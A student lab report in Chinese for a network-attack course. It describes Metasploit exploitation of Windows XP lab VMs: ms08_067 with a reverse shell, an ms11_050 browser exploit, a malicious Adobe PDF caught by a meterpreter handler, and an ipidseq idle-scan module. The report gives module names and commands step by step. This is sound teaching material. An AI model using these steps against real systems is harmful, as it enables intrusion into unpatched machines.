20155311《网络对抗》MSF基础应用

20155311《网络对抗》MSF基础应用

实验过程

实验系统

  • 靶机1:Windows XP Professional SP2 ,IP地址:192.168.136.129
  • 靶机2:Windows XP vivian SP3 简体中文,IP地址:192.168.136.130
  • Kali IP地址:192.168.136.128

1、主动攻击:ms08_067
•使用靶机1和Kali
先msfconsole进入msf,再用search ms08_067查询一下针对该漏洞的攻击模块:

  • 用show targets查看可以被攻击的靶机的操作系统型号:

  • 用show payloads查看可以供我们使用的攻击载荷:

  • 从中找到一个可用的攻击载荷generic/shell_reverse_tcp,用set payload generic/shell_reverse_tcp设置payload:

  • 用show options查看需要设置的参数

  • 这里需要设置RHOST(靶机IP)和LHOST(Kali的IP),使用set 需设置的参数名 参数值命令即可设置:

  • 设置target选项目标(例如我攻击系统为WIN xp 中文简体 SP2,所以选择10)

  • 确认参数设置无误后,用exploit指令开始攻击:

  • 攻击成功后会获取靶机的shell,可以对其进行操作:

2、针对浏览器的攻击:ms11_050

  • 使用靶机2和Kali(一开始用自己的最后会有问题,所以换了老师之前的kali)

用search ms11_050查询一下针对该漏洞的攻击模块,并用use windows/browser/ms11_050_mshtml_cobjectelement使用该模块:

  • 用info查看该模块的信息(这个指令相当于show targets、show options等的集合版):

  • 用set payload windows/meterpreter/reverse_tcp设置payload,并设置需要设置的参数。

用show options确认需要设置的参数是否已经设置好。

  • 确认参数设置无误后,用exploit指令开始攻击,攻击成功后会有靶机需要访问的网址:

  • 在靶机IE上输入该网址

  • kali中显示session 1已经创建,并显示其会话ID

然而实验2还是失败了 XP系统的IE浏览器已经崩掉了 好多同学跟我有同样的毛病。。。。。。。。。。。。

3、针对客户端的攻击:adobe_toolbutton

  • 使用靶机2和Kali

用search adobe查询一下针对该漏洞的攻击模块:

  • 选择一个模块并使用该模块:

  • 用show targets查看可以被攻击的靶机的操作系统型号

  • 设置payload攻击载荷,命令set payload windows/meterpreter/reverse_tcp

  • 用show options查看需要设置的参数:

  • 设置相应参数,实施exploit攻击,发现在/root/.msf4/local/目录下成功生成了一个qiaolei05.pdf文件:

  • 这个时候你可能在你的kali中找不到这个pdf文件,那么打开文件夹的隐藏文件显示就可以找到啦

  • 将pdf文件粘贴到靶机win xp

  • 在kali中和前几次实验一样打开并设置监听模块use exploit/multi/handler,set payload windows/meterpreter/reverse_tcp,再设置IP以及端口

  • 在靶机上打开刚刚那个pdf文件(这个时候可能xp没有adobe就需要下载一波,地址呢可以到这里下载),可以观察到Kali成功获取了靶机的shell,可以对其进行操作:

4、成功应用任何一个辅助模块:ipidseq

  • ipidseq
    功能:扫描网段中的存活ip,它会识别被发现主机的IPID(用于跟踪IP包的次序的一种技术)序列模式,并且表示出哪些是0、随机或递增的。

拥有递增的IPID的空闲(空闲是指该主机在特定时间内不向网络发送数据包)主机(即显示为Incremental!的条目),不会被网络上的其它主机严重影响,可以用来进行TCP空闲扫描。

TCP空闲扫描:是一种高级的nmap扫描方式,这种扫描方式能让我们冒充网络上另一台主机的IP地址对目标进行更为隐秘的扫描。

  • 用show auxiliary查看所有辅助模块,并选择其中的一个,选的是scanner/ip/ipidseq:

  • 查看需要设置的参数,设置完成后确认一下,这里可以进行对单一目标主机的扫描,然后就可以开始exploit了。

  • 也可以对指定网段的主机进行扫描:

实验总结和收获

  • 本次实验是对我们之前已经初步用过的msf有了全面的认识和使用。通过查阅各种漏洞,发现真的是触目惊心,各式各样,五花八门,只有想不到,没有实现不了的。如果想对微软的各种漏洞有个全面的了解,可以通过查看microsoft的安全技术中心中的安全公告。 而微软对其门下的各种系统的技术支持是有生命周期的,而其中我们最为熟知的xp已经不在技术支持范围内。在中国,仍然使用着xp系统的计算机还有很多(尤其是父母这辈人,他们本就缺乏这方面的安全知识),而xp还存在着许多已知、未知的漏洞会被攻击者加以利用。足见更新软件、系统的重要性。
  • 通过这次实验基本掌握了msf渗透攻击的“套路”,无非是search 查看漏洞信息,show targets 查看可以攻击的系统,show payloads 选择合适的载荷 ,show options 查看需要修改那些属性,info查看各种详细信息,最后反弹链接shell,只要找到合适的靶机,合适的版本,“三板斧”下来基本都可以解决。
posted @ 2018-04-26 18:41  Gaoziyun  阅读(204)  评论(0编辑  收藏  举报